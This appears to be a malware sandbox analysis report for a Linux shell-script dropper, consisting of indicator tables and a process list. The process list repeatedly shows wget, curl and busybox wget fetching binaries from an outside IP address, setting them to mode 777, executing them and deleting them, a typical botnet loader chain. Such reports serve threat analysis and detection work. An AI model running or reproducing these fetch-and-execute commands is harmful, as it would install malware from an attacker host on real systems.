| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
